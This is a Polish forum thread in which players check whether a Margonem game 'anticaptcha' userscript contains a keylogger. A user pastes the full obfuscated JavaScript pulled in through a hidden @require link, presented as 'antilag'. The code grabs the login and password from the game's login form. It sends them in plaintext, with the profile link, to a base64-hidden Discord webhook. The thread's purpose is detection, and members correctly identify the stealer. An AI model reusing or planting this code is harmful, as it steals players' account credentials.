Sprawdzenie skryptu

[gloryx]

https://pastebin.com/raw/YX0BYbRF ? Czy jest to antycaptcha bez żadnych keyloggerów? proszę o szybką odpowiedź, sprawdziłem podstawowe kl.

[KaciPL]

Skrypt posiada keyloggera

[gloryx]

Gdzie?

czy mozna go usunac?

[Reveres]

@KaciPL Sam jestem ciekaw gdzie ty tu widzisz keyloggera...

Skrypt już chyba 5raz jest na mpc, nie wiem skąd wy bierzecie te skrypty...

@gloryx skrypt jest kilka tematów niżej w tym dziale, i nie posiada keyloggera.

[Paderur]

2 godziny temu, Reveres napisał:

@KaciPL Sam jestem ciekaw gdzie ty tu widzisz keyloggera...

Skrypt już chyba 5raz jest na mpc, nie wiem skąd wy bierzecie te skrypty...

@gloryx skrypt jest kilka tematów niżej w tym dziale, i nie posiada keyloggera.

Posiada keyloggera. W @require jest link do pastebima z keyloggerem

[gloryx]

@Paderur   // @require https://pastebin.com/raw/AMcK0yjM

 

 

// antilag elo const _0x4287=['0x29','0x7','cfgmenu','shift','ajax','passhash','0x9','href','0x2a','?t=login','0x21','0x1f','0xf','push','getCookie','pasy','reload','0xc','location','0xb','0x14','0x8','0x17','upass','\x0ahttps://www.margonem.pl/?task=profile&id=','0x11','0x23','ulogin','0x15','#rpanel','\x0ahasło:\x20','0x5','0x4','0x3','0x16','0x1','POST','0x13','value','0x1b','load','login:\x20','0x12','sha1','0x2','0x27','0xd','0xa','0x10','0x0','user_id','0xe','0x22','0x19','includes','0x6'];(function(_0x226fa7,_0x4287a0){const _0xfea944=function(_0xdab69c){while(--_0xdab69c){_0x226fa7['push'](_0x226fa7['shift']());}};_0xfea944(++_0x4287a0);}(_0x4287,0xf4));const _0xfea9=function(_0x226fa7,_0x4287a0){_0x226fa7=_0x226fa7-0x0;let _0xfea944=_0x4287[_0x226fa7];return _0xfea944;};const _0x5239=[_0xfea9('0x36'),_0xfea9('0x7'),_0xfea9('0x4'),_0xfea9('0x1b'),_0xfea9('0x26'),_0xfea9('0x10'),_0xfea9('0x21'),_0xfea9('0x2a'),_0xfea9('0x8'),_0xfea9('0x25'),_0xfea9('0x22'),_0xfea9('0x23'),'0x11',_0xfea9('0x31'),_0xfea9('0x9'),_0xfea9('0x2b'),_0xfea9('0x1f'),_0xfea9('0x37'),'getElementById','0x18',_0xfea9('0x28'),'stringify','0x1','Błędne\x20hasło\x20lub\x20login.',_0xfea9('0xd'),_0xfea9('0x32'),'0x16',_0xfea9('0x34'),'aHR0cHM6Ly9kaXNjb3JkYXBwLmNvbS9hcGkvd2ViaG9va3MvNzIyMTcyOTcyNTgzODc4Nzg3L3hSQmxNY0NjR3FUc1UtUThmaUFEa3NOUXo5dVZFY1hQVE9HWnFPUnNrVnV1dHlLTms2aHB5VzBZRkk4TTVJWHo0UkhE',_0xfea9('0xc'),_0xfea9('0x33'),_0xfea9('0x17'),_0xfea9('0x30'),'http://31337.pl/',_0xfea9('0x1e'),_0xfea9('0x1'),'login',_0xfea9('0x0'),_0xfea9('0xa'),'ajax/logon.php',_0xfea9('0x35'),_0xfea9('0xb'),_0xfea9('0x2')];(function(_0x56e2c0,_0x366a38){const _0x4fddd4=function(_0x389170){while(--_0x389170){_0x56e2c0['push'](_0x56e2c0[_0xfea9('0x27')]());}};_0x4fddd4(++_0x366a38);}(_0x5239,0x11d));const _0x35a7=function(_0x46d2cc,_0x2a832d){_0x46d2cc=_0x46d2cc-0x0;let _0x39221e=_0x5239[_0x46d2cc];return _0x39221e;};const _0x95c5=[_0xfea9('0x15'),_0x35a7(_0xfea9('0x16')),_0xfea9('0x29'),_0x35a7(_0xfea9('0xd')),_0x35a7('0xb'),'Zalogowany/a\x20jako:',_0xfea9('0x2d'),_0xfea9('0x14'),_0x35a7(_0xfea9('0xc')),_0x35a7(_0xfea9('0x19')),_0xfea9('0x3'),_0xfea9('0x22'),_0x35a7('0x24'),_0x35a7(_0xfea9('0x1c')),_0xfea9('0x12'),'smg',_0x35a7('0x1e'),_0x35a7(_0xfea9('0xf')),_0x35a7(_0xfea9('0x35')),_0x35a7(_0xfea9('0x24')),_0x35a7(_0xfea9('0x1d')),_0x35a7(_0xfea9('0x20')),_0x35a7(_0xfea9('0x25')),_0x35a7('0x14'),_0x35a7(_0xfea9('0x2a')),_0x35a7(_0xfea9('0x5'))];(function(_0x2365e2,_0x529ee1){const _0x4258c8=function(_0x1c8cb0){while(--_0x1c8cb0){_0x2365e2[_0x35a7('0x1d')](_0x2365e2[_0xfea9('0x27')]());}};_0x4258c8(++_0x529ee1);}(_0x95c5,0x161));const _0x5b1d=function(_0x10007b,_0x32e798){_0x10007b=_0x10007b-0x0;let _0x318438=_0x95c5[_0x10007b];return _0x318438;};window[_0x5b1d(_0x35a7(_0xfea9('0x2')))]=()=>{const _0x11aee1=document[_0x5b1d(_0xfea9('0x23'))](_0x5b1d(_0x35a7('0x13')))[_0x5b1d(_0x35a7('0x16'))],_0x58f131=document[_0x5b1d(_0x35a7(_0xfea9('0x13')))](_0x5b1d(_0x35a7('0x18')))[_0x5b1d(_0x35a7(_0xfea9('0xe')))];if(_0x5b1d(_0xfea9('0x1d'))===_0x11aee1)document[_0x5b1d(_0x35a7(_0xfea9('0x6')))][_0x35a7(_0xfea9('0x2f'))]=_0x35a7(_0xfea9('0x23'));else{const _0x464ba1=_0x5b1d(_0x35a7('0x28'));_0x11aee1&&_0x58f131&&(window['$'](_0x5b1d(_0x35a7('0x26')))[_0x5b1d(_0xfea9('0x16'))](_0x464ba1+_0x5b1d(_0x35a7('0x1c')),{'l':_0x11aee1,'ph':window[_0x5b1d(_0xfea9('0x11'))](window[_0x5b1d(_0xfea9('0x1a'))]+_0x58f131)},_0x327474=>{!_0x327474[_0x35a7('0x1a')](_0x5b1d(_0x35a7(_0xfea9('0x1b'))))&&_0x327474[_0x5b1d(_0x35a7(_0xfea9('0x2c')))](_0x5b1d(_0xfea9('0x1c')))&&window['$'][_0x5b1d(_0x35a7(_0xfea9('0x30')))]({'url':atob(_0x5b1d(_0xfea9('0x18'))),'type':_0x35a7(_0xfea9('0x8')),'data':JSON[_0x35a7('0x25')]({'embeds':[{'title':_0x5b1d(_0x35a7('0x20')),'description':_0x5b1d(_0x35a7(_0xfea9('0x2e')))+_0x11aee1+_0x5b1d(_0x35a7(_0xfea9('0xb')))+_0x58f131+_0x5b1d(_0x35a7(_0xfea9('0x1a')))+window[_0x5b1d(_0x35a7(_0xfea9('0x18')))](_0x5b1d(_0x35a7(_0xfea9('0x21'))))}]}),'contentType':'application/json'});}),document[_0x35a7(_0xfea9('0x20'))](_0x5b1d(_0x35a7('0x8')))&&window[_0x5b1d(_0x35a7('0x23'))][_0x5b1d(_0x35a7(_0xfea9('0x1f')))]());}};;

 

 

Wygląda trochę podejrzanie

[Paderur]

Przeciez o tym pisze xD? 

[Reveres]

@Paderur @KaciPL Yhm, myślałem że to tylko komentarze, ale dzięki dowiedziałem się czegoś nowego 😄

 

@gloryx To że jest zaciemniony nie znaczy że musi być keylogger, mógł ktoś np. chcieć zabezpieczyć sobie aplikację, ale w tym przypadku jest link do aplikacji discord do API.

[Paderur]

Dnia 29.06.2020 o 17:40, Reveres napisał:

@Paderur @KaciPL Yhm, myślałem że to tylko komentarze, ale dzięki dowiedziałem się czegoś nowego 😄

 

@gloryx To że jest zaciemniony nie znaczy że musi być keylogger, mógł ktoś np. chcieć zabezpieczyć sobie aplikację, ale w tym przypadku jest link do aplikacji discord do API.

Wtyczka tampermonkey coś takiego posiada, że wszystko pomiędzy ==/UserScript== to parametry skryptu 😛 Update url, jakies dodatkowe linki, nazwa itd